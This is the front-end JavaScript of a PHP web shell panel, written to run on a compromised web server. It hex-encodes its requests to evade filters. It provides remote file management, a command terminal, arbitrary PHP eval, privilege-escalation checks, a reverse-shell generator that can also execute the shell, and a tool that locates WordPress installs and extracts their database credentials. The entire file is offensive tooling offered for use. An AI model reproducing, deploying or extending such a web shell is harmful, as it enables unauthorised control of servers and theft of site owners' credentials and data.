function h2b(h){const b=new Uint8Array(h.length/2);for(let i=0;i<h.length;i+=2)b[i/2]=parseInt(h.substr(i,2),16);return b;}
async function api(t){
const bar=document.getElementById('bar');bar.style.width='65%';
t.d=CWD;
const j=JSON.stringify(t);let h='';for(let i=0;i<j.length;i++)h+=j.charCodeAt(i).toString(16).padStart(2,'0');
const fd=new FormData();fd.append('_r',h);
try{
const r=await(await fetch('',{method:'POST',body:fd})).json();
bar.style.width='100%';setTimeout(()=>bar.style.width='0',180);return r;
}catch(e){bar.style.width='0';return{ok:false,e:'network'};}
}
// ── AUTH ──────────────────────────────────────────────────────────────────────
async function checkAuth(){const r=await api({a:'ping'});if(r.ok){closeOv('loginOv');ls();}}
async function doLogin(){
const k=document.getElementById('lk').value;
const r=await api({a:'auth',k});
if(r.ok){closeOv('loginOv');ls();}
else{document.getElementById('le').textContent='[ access denied ]';document.getElementById('lk').value='';}
}
async function doLogout(){if(!confirm('Logout?'))return;await api({a:'logout'});location.reload();}
// ── TABS ──────────────────────────────────────────────────────────────────────
function switchTab(el,id){
document.querySelectorAll('.tab').forEach(t=>t.classList.remove('on'));
document.querySelectorAll('.panel').forEach(p=>p.classList.remove('on'));
el.classList.add('on');document.getElementById('p-'+id).classList.add('on');
if(id==='info')loadInfo();
}
// ── FILES ─────────────────────────────────────────────────────────────────────
async function ls(){
const r=await api({a:'ls'});if(!r.ok)return;
CWD=r.cwd;
let bc='<span onclick="nav(\''+s2h('/')+'\')" style="color:var(--neon)">⌂</span>';
(r.bc||[]).forEach(b=>bc+=`<span class="sep">/</span><span onclick="nav('${b.x}')">${h2s(b.n)}</span>`);
document.getElementById('bc').innerHTML=bc;
document.getElementById('tp').textContent=h2s(CWD)+' $ ';
let html='';
(r.d||[]).forEach(d=>{
html+=`<tr><td><a href="#" onclick="nav('${d.x}')" style="color:#ddd;text-decoration:none"><i class="fa fa-folder ico" style="color:var(--neon)"></i>${h2s(d.n)}</a></td><td style="color:#1e1e1e">DIR</td><td style="color:#1e1e1e">${d.t}</td><td><span class="badge">${d.p}</span></td><td style="text-align:right"><i class="fa fa-pen" onclick="renF('${s2h(d.n)}')" style="color:#2a2a2a;cursor:pointer;margin-right:8px"></i><i class="fa fa-trash" onclick="delF('${s2h(d.n)}')" style="color:var(--rd);cursor:pointer;opacity:.5"></i></td></tr>`;
});
(r.f||[]).forEach(f=>{
let ic='fa-file',cc='#3a3a3a';
if(f.e==='php'){ic='fa-php';cc='#a78bfa';}
else if(['png','jpg','jpeg','gif','webp','svg'].includes(f.e)){ic='fa-image';cc='#f59e0b';}
else if(['txt','log','md','conf','cfg','ini','env'].includes(f.e)){ic='fa-file-alt';cc='#60a5fa';}
else if(['zip','gz','tar','rar','7z'].includes(f.e)){ic='fa-file-archive';cc='#34d399';}
else if(['sh','py','rb','pl','js'].includes(f.e)){ic='fa-file-code';cc='#f87171';}
html+=`<tr><td><i class="fa ${ic} ico" style="color:${cc}"></i>${h2s(f.n)}</td><td style="color:#2a2a2a">${f.s}</td><td style="color:#1e1e1e">${f.t}</td><td><span class="badge">${f.p}</span></td><td style="text-align:right"><i class="fa fa-code" onclick="editF('${s2h(f.n)}')" style="color:#666;cursor:pointer;margin-right:8px" title="Edit"></i><i class="fa fa-download" onclick="dlF('${s2h(f.n)}')" style="color:var(--c2);cursor:pointer;margin-right:8px;opacity:.7" title="Download"></i><i class="fa fa-pen" onclick="renF('${s2h(f.n)}')" style="color:#2a2a2a;cursor:pointer;margin-right:8px" title="Rename"></i><i class="fa fa-trash" onclick="delF('${s2h(f.n)}')" style="color:var(--rd);cursor:pointer;opacity:.5" title="Delete"></i></td></tr>`;
});
document.getElementById('tb').innerHTML=html||'<tr><td colspan="5" style="color:#1a1a1a;text-align:center;padding:28px;font-size:11px">[empty directory]</td></tr>';
}
function nav(hx){CWD=hx;ls();}
async function delF(hn){if(!confirm('Delete '+h2s(hn)+'?'))return;const r=await api({a:'rm',n:h2s(hn)});r.ok?ls():alert('Error deleting');}
async function renF(hn){const o=h2s(hn);const n=prompt('Rename:',o);if(!n||n===o)return;const r=await api({a:'rn',o,n});r.ok?ls():alert('Error renaming');}
async function mkDir(){const n=prompt('Directory name:');if(!n)return;const r=await api({a:'mk',n});r.ok?ls():alert('Error');}
async function editF(hn){
const n=h2s(hn);const r=await api({a:'rd',n});
if(!r.ok){alert('Cannot read: '+n);return;}
document.getElementById('edC').value=h2s(r.c);
document.getElementById('edN').textContent='// '+n;
_EDF=n;showOv('edOv');
}
async function saveFile(){
const c=document.getElementById('edC').value;
const r=await api({a:'wr',n:_EDF,c:s2h(c)});
r.ok?(closeOv('edOv'),ls()):alert('Save failed');
}
async function dlF(hn){
const n=h2s(hn);const r=await api({a:'dl',n});
if(!r.ok){alert('Error downloading');return;}
const b=new Blob([h2b(r.c)],{type:'application/octet-stream'});
const a=document.createElement('a');a.href=URL.createObjectURL(b);a.download=h2s(r.n);a.click();
}
async function doUpload(){
const file=document.getElementById('upF').files[0];if(!file)return;
let done=0,first=true;document.getElementById('upS').textContent='0%';
while(done<file.size){
const chunk=file.slice(done,done+65536);
const ab=await new Promise(res=>{const fr=new FileReader();fr.onload=e=>res(e.target.result);fr.readAsArrayBuffer(chunk);});
const hex=Array.from(new Uint8Array(ab)).map(b=>b.toString(16).padStart(2,'0')).join('');
await api({a:'up',n:file.name,d:hex,f:first});
done+=65536;first=false;
document.getElementById('upS').textContent=Math.min(100,Math.round(done/file.size*100))+'%';
}
document.getElementById('upS').textContent='done!';
setTimeout(()=>{closeOv('upOv');ls();},700);
}
// ── SHELL ─────────────────────────────────────────────────────────────────────
async function runCmd(cmd){
const to=document.getElementById('to');
to.textContent+='$ '+cmd+'\n';
if(/^cd(\s|$)/.test(cmd)){
const path=cmd.replace(/^cd\s*/,'').trim()||'~';
const r=await api({a:'cd',p:path});
if(r.ok){CWD=r.cwd;document.getElementById('tp').textContent=h2s(CWD)+' $ ';to.textContent+=h2s(CWD)+'\n';}
else to.textContent+='cd: no such file or directory\n';
}else{
const r=await api({a:'ex',cmd});
if(r.ok){to.textContent+=h2s(r.out)||'';CWD=r.cwd;document.getElementById('tp').textContent=h2s(CWD)+' $ ';}
}
to.scrollTop=to.scrollHeight;
}
function termKd(e){
const el=document.getElementById('tc');
if(e.key==='Enter'){const cmd=el.value.trim();if(!cmd)return;_HIST.unshift(cmd);_HI=0;el.value='';runCmd(cmd);}
else if(e.key==='ArrowUp'){e.preventDefault();if(_HI<_HIST.length)el.value=_HIST[_HI++];}
else if(e.key==='ArrowDown'){e.preventDefault();_HI=Math.max(0,_HI-1);el.value=_HIST[_HI]||'';}
}
// ── PHP EVAL ──────────────────────────────────────────────────────────────────
async function runPHP(){
const code=document.getElementById('phpcode').value;
const r=await api({a:'ev',code});
document.getElementById('phpout').textContent=r.ok?h2s(r.out):'[error]';
}
function clrPHP(){document.getElementById('phpcode').value='';document.getElementById('phpout').textContent='';}
// ── INFO ──────────────────────────────────────────────────────────────────────
async function loadInfo(){
const r=await api({a:'info'});
if(!r.ok){document.getElementById('infoC').innerHTML='<div style="color:#222;text-align:center;padding:50px">failed to load</div>';return;}
const i=r.i;
document.getElementById('infoC').innerHTML=`<div class="ig">
<div class="cd"><h3>SYSTEM</h3>
<div class="kv"><span class="k">OS</span><span class="v">${i.os}</span></div>
<div class="kv"><span class="k">PHP</span><span class="v">${i.php} (${i.sapi})</span></div>
<div class="kv"><span class="k">User</span><span class="v">${i.user}</span></div>
<div class="kv"><span class="k">Server</span><span class="v">${i.srv}</span></div>
<div class="kv"><span class="k">IP:Port</span><span class="v">${i.ip}:${i.port}</span></div>
</div>
<div class="cd"><h3>PATHS</h3>
<div class="kv"><span class="k">CWD</span><span class="v">${i.cwd}</span></div>
<div class="kv"><span class="k">DocRoot</span><span class="v">${i.doc}</span></div>
<div class="kv"><span class="k">Shell</span><span class="v">${h2s(i.file)}</span></div>
</div>
<div class="cd"><h3>RESOURCES</h3>
<div class="kv"><span class="k">Memory</span><span class="v">${i.mem}</span></div>
<div class="kv"><span class="k">Disk Free</span><span class="v">${i.df}</span></div>
<div class="kv"><span class="k">Disk Total</span><span class="v">${i.dt}</span></div>
</div>
<div class="cd" style="grid-column:1/-1"><h3>DISABLED FUNCTIONS</h3>
<div style="font-size:10px;color:${i.disable?'#f87171':'var(--neon)'};line-height:1.8">${i.disable||'(none — fully featured)'}</div>
</div>
<div class="cd" style="grid-column:1/-1"><h3>LOADED EXTENSIONS</h3>
<div style="font-size:10px;color:#2a2a2a;word-break:break-all;line-height:1.9">${i.ext}</div>
</div>
</div>`;
}
// ── TOOLS ─────────────────────────────────────────────────────────────────────
async function net(sub){
const h=document.getElementById('nH').value;
const p=document.getElementById('nP').value;
const r=await api({a:'net',s:sub,h,u:h,p});
document.getElementById('netOut').textContent=h2s(r.out||'');
}
async function pe(sub){
const r=await api({a:'pe',s:sub});
document.getElementById('peOut').textContent=h2s(r.out||'');
}
async function genRS(run){
if(run&&!confirm('Execute reverse shell on target?'))return;
const ip=document.getElementById('rsIp').value;
const port=document.getElementById('rsPort').value;
const t=document.getElementById('rsType').value;
const r=await api({a:'rs',ip,port,t,run:!!run});
document.getElementById('rsOut').textContent=h2s(r.cmd||'');
}
async function wp(sub){
const r=await api({a:'wp',s:sub});
let out='';
if(sub==='find')out=r.root?'WordPress root: '+h2s(r.root):(r.e||'Not found');
else if(sub==='creds'&&r.db)out=Object.entries(r.db).map(([k,v])=>k+': '+v).join('\n');
else out=r.e||JSON.stringify(r,null,2);
document.getElementById('wpOut').textContent=out;
}
// ── OVERLAY UTILS ─────────────────────────────────────────────────────────────
function showOv(id){document.getElementById(id).classList.add('on');}
function closeOv(id){document.getElementById(id).classList.remove('on');}
document.addEventListener('keydown',e=>{if(e.key==='Escape')document.querySelectorAll('.ov.on:not(#loginOv)').forEach(o=>o.classList.remove('on'));});
// ── START ─────────────────────────────────────────────────────────────────────
checkAuth();
</script>
</body>
</html>